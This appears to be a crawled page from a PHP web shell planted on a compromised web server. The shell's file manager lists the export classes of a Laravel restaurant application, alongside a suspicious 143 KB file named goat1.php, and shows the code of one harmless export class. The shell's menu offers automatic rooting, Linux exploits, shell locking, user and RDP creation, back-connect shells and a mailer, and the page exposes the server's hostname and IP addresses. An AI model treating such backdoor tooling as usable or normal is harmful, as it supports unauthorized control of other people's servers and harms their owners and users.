Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo9.com /
app /
Exports /
[ HOME SHELL ]
Name
Size
Permission
Action
AdministratorExport.php
1.36
KB
-rwxrwxr-x
ChefExport.php
1.17
KB
-rwxrwxr-x
CreditBalanceReportExport.php
1.26
KB
-rwxrwxr-x
CustomerExport.php
1.26
KB
-rwxrwxr-x
DiningTableExport.php
1.17
KB
-rwxrwxr-x
EmployeeExport.php
1.34
KB
-rwxrwxr-x
ItemCategoryExport.php
1.2
KB
-rwxrwxr-x
ItemExport.php
1.63
KB
-rwxrwxr-x
ItemsReportExport.php
1.47
KB
-rwxrwxr-x
OfferExport.php
1.31
KB
-rwxrwxr-x
OrderExport.php
1.56
KB
-rwxrwxr-x
SalesReportExport.php
1.91
KB
-rwxrwxr-x
TransactionExport.php
1.51
KB
-rwxrwxr-x
WaiterExport.php
1.2
KB
-rwxrwxr-x
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ItemsReportExport.php
<?php namespace App\Exports; use App\Libraries\AppLibrary; use App\Services\ItemService; use App\Http\Requests\PaginateRequest; use Maatwebsite\Excel\Concerns\WithHeadings; use Maatwebsite\Excel\Concerns\FromCollection; class ItemsReportExport implements FromCollection, WithHeadings { public ItemService $itemService; public PaginateRequest $request; public function __construct(ItemService $itemService, $request) { $this->itemService = $itemService; $this->request = $request; } public function collection() : \Illuminate\Support\Collection { $itemsReportArray = []; $itemsReportsArray = $this->itemService->itemReport($this->request); $total = 0; foreach ($itemsReportsArray as $item) { $total += $item->orders->count(); $itemsReportArray[] = [ $item->name, optional($item->category)->name, trans('itemType.' . $item->item_type), $item->orders->count() ]; } $itemsReportArray[] = [ trans('all.label.total'), '', '', $total ]; return collect($itemsReportArray); } public function headings() : array { return [ trans('all.label.name'), trans('all.label.item_category_id'), trans('all.label.item_type'), trans('all.label.quantity'), ]; } }
Close